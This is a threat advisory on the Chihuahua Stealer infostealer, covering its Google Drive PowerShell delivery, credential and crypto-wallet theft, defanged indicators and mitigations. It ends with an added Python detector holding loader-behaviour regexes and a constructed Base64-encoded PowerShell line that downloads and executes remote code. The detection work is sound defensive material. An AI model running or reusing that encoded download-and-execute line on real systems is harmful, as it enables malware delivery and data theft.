PowerShell-Delivered Chihuahua Stealer Distributed via Google Drive Targets Credentials and Wallets

Threat Group: Unknown
Threat Type: Infostealer Malware
Exploited Vulnerabilities: None (Relies on social engineering and legitimate services)
Malware Used: Chihuahua Stealer
Threat Score: 🔴 High (7.8/10) – Due to its advanced encryption techniques, stealthy multi-stage execution, and targeting of sensitive data such as browser credentials and cryptocurrency wallets.
Last Threat Observation: May 13, 2025 – G DATA Security Blog


Overview

Chihuahua Stealer is a newly identified .NET-based infostealer that combines common malware techniques with advanced capabilities to exfiltrate sensitive data from compromised Windows systems. The infection begins with an obfuscated PowerShell script delivered through a Google Drive link. Once executed, the malware initiates a multi-stage payload delivery chain designed for persistence and stealth.

This threat targets browser-stored credentials and crypto wallet extensions. The stolen data is compressed, encrypted using AES-GCM via Windows Cryptography API: Next Generation (CNG), and then exfiltrated over HTTPS. Chihuahua Stealer demonstrates an elevated level of sophistication through its use of legitimate encryption APIs and a detailed system cleanup process.


Key Details

Delivery Method: Obfuscated PowerShell script distributed via Google Drive
Target: Windows systems (browser credentials and crypto wallets)

Functions:

  • Multi-stage payload execution using PowerShell loaders
  • Scheduled task creation for persistence under disguised task names
  • Data harvesting from Chromium-based browsers (e.g., Chrome, Edge, Brave)
  • Targeting of crypto wallets including MetaMask, Exodus, and Binance extensions
  • Extraction of browser autofill information, cookies, and login data
  • Compression of stolen data into archive files
  • AES-GCM encryption of stolen archives using Windows CNG API
  • Exfiltration of encrypted data over HTTPS via hardcoded C2 endpoints
  • Collection of system-specific identifiers for victim fingerprinting
  • Self-deletion and cleanup mechanisms to avoid post-infection detection

Obfuscation Techniques:

  • Base64-encoded script blocks with layered decoding stages
  • Hexadecimal string encoding to bypass static signature detection
  • Use of Windows-native utilities to blend into normal operations
  • Registration of scheduled jobs mimicking legitimate system tasks
  • Dynamic loading of .NET assemblies in memory without writing to disk

Attack Vectors

The infection vector leverages social engineering, luring users to execute a malicious PowerShell script hosted on Google Drive. This script acts as the first stage in a chain of payloads that fetch and deploy further components to establish a foothold on the system. The malware creates scheduled tasks to ensure persistence and disguises its activity using encoding techniques. Exfiltration is conducted over HTTPS, bypassing traditional perimeter defenses by mimicking legitimate traffic.

Attackers exploit user trust in cloud-based services to distribute the initial script, taking advantage of the perceived legitimacy of Google Drive URLs to avoid detection by email filters and web proxies. Once the script is executed, it performs system reconnaissance and connects to command-and-control (C2) infrastructure for downloading additional payloads.

The payloads are dynamically loaded in memory to avoid dropping artifacts on disk. Scheduled tasks are registered under misleading names to reduce user suspicion and evade administrative review. The malware avoids redundant infections by fingerprinting the host system and tagging the exfiltrated data with unique victim identifiers.

Chihuahua Stealer also disables telemetry and logging services on the host where possible and uses encryption and HTTPS to make its traffic indistinguishable from benign network communications. This layered evasion approach makes it particularly challenging for traditional endpoint detection and response (EDR) tools to identify and mitigate infections in their early stages.


Known Indicators of Compromise (IoCs)

FileHash-MD5

  • cdfdc1fde47a5d2899cf09d4c01e00e9

FileHash-SHA1

  • db1d4986391052ad620adef9eb0c181a8ace5c57

FileHash-SHA256

  • afa819c9427731d716d4516f2943555f24ef13207f75134986ae0b67a0471b84
  • c9bc4fdc899e4d82da9dd1f7a08b57ac62fc104f93f2597615b626725e12cae8

URL

  • hxxps://flowers[.]hold-me-finger[.]xyz/index2[.]php
  • hxxps://onedrive[.]office-note[.]com/res?a=c&b=&c=8f2669e5-01c0-4539-8d87-110513256828&s=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiI4YTJlNmI1MDQ4M2E5MWYyODkz

Domain

  • cat-watches-site[.]xyz

Hostname

  • cdn[.]findfakesnake[.]xyz
  • flowers[.]hold-me-finger[.]xyz
  • onedrive[.]office-note[.]com


Mitigation and Prevention

User Awareness: Provide security training regarding phishing and unsafe scripts.
Email Filtering: Use advanced filters to block suspicious links or attachments.
Antivirus Protection: Ensure signatures are updated to detect obfuscated PowerShell and .NET malware.
Two-Factor Authentication (2FA): Enforce 2FA for all remote and sensitive system access.
Monitor Logs: Regularly monitor PowerShell execution and scheduled task creation logs.
Regular Updates: Apply security patches and OS updates promptly.
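Detection logic for the obfuscation techniques listed above and for the "Monitor Logs" item, added here as an example that is not part of the advisory or of G DATA's research: it scans PowerShell script block text (Windows Event ID 4104) for the loader behaviours the advisory describes, peeling nested Base64 layers first so a Google Drive fetch hidden one encoding stage down is still matched. The regexes are heuristics written for this example, the hostnames are the advisory's own IoCs, and the two-stage sample script block is constructed.

```python
import base64
import re

# Hostnames are the advisory's listed IoCs; everything else here is constructed.
IOC_HOSTS = {"cat-watches-site.xyz", "cdn.findfakesnake.xyz",
             "flowers.hold-me-finger.xyz", "onedrive.office-note.com"}
# Loader behaviours the advisory describes: layered Base64, hex string decoding,
# in-memory .NET assembly loading, scheduled-task persistence, Drive delivery.
PATTERNS = {
    "base64_decode": re.compile(r"FromBase64String", re.I),
    "hex_decode": re.compile(r"\[Convert\]::ToByte\(|-split\s*'\(\.\.\)'", re.I),
    "drive_download": re.compile(r"drive\.google\.com", re.I),
    "inmem_assembly": re.compile(r"Reflection\.Assembly\]::Load\(", re.I),
    "sched_task": re.compile(r"Register-ScheduledTask|schtasks(?:\.exe)?\s+/create", re.I),
}
B64_RUN = re.compile(r"[A-Za-z0-9+/]{32,}={0,2}")

def unwrap_base64(text, max_depth=3):
    """Return text plus every Base64 layer nested in it, so stages hidden by
    layered encoding are still inspected. UTF-16LE (as used by PowerShell's
    -EncodedCommand) is recognised by the zero high byte of ASCII text."""
    layers, frontier = [text], [text]
    for _ in range(max_depth):
        nxt = []
        for blob in (b for chunk in frontier for b in B64_RUN.findall(chunk)):
            try:
                raw = base64.b64decode(blob, validate=True)
                decoded = raw.decode("utf-16-le" if raw[1:2] == b"\x00" else "utf-8")
            except ValueError:  # not Base64, or not text in either encoding
                continue
            if decoded.isascii() and decoded.isprintable():
                nxt.append(decoded)
        if not nxt:
            break
        layers, frontier = layers + nxt, nxt
    return layers

def score_script_block(text):
    """Map an Event ID 4104 script block to the advisory behaviours it shows."""
    hits = set()
    for layer in unwrap_base64(text):
        hits.update(name for name, rx in PATTERNS.items() if rx.search(layer))
        hits.update("ioc:" + h for h in IOC_HOSTS if h in layer.lower())
    return hits

# Constructed two-stage sample: the outer block shows only FromBase64String;
# the Drive download is visible only after the inner stage is decoded.
INNER = "(New-Object Net.WebClient).DownloadString('https://drive.google.com/uc?id=PLACEHOLDER')"
SAMPLE_4104 = ("iex([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('"
               + base64.b64encode(INNER.encode("utf-16-le")).decode() + "')))")
```

Feeding 4104 script block text from a SIEM export through score_script_block and alerting on two or more hits, or on any ioc: hit, turns the advisory's behaviour list into a hunt query rather than a signature on one sample.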


Risk Assessment

Chihuahua Stealer poses a high risk to individuals and organisations storing credentials and cryptocurrency wallets in browser environments. Its reliance on encrypted exfiltration, multi-stage obfuscation, and scheduled persistence mechanisms complicates detection and remediation. Proactive threat hunting and behavioural monitoring are recommended.


Conclusion

Chihuahua Stealer exemplifies the continuing evolution of .NET malware threats, combining layered obfuscation, encrypted exfiltration, and system persistence into a potent infostealer. As attackers turn to cloud-hosted scripts and system-native APIs, defenders must remain vigilant with a layered security approach.


Sources: